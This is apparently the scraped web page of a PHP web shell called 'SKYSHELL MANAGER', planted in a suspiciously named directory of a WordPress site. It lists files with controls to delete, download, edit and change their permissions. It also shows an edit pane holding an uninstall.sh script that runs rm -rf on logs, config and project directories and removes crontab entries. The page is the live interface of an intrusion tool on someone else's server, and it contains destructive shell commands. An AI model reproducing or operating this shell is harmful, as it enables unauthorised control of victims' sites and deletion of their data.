📁
SKYSHELL MANAGER
PHP v8.0.30
Create
Create
Path:
root
/
home
/
godaofbq
/
besthyperbaric.com
/
wp-includesac411f
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📄
error_log
2645.67 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: uninstall.sh
#!/bin/bash PROJECT_ROOT="$(dirname "$(readlink -f "$0")")" . "$PROJECT_ROOT"/utils.sh rm -rf "${LOG_FILE}"* "$CONF_DIR" "${PROJECT_ROOT:?}/var" "${PROJECT_ROOT:?}/python" crontab -l 2>/dev/null | sed "\~${PROJECT_ROOT}~d" | crontab -
Save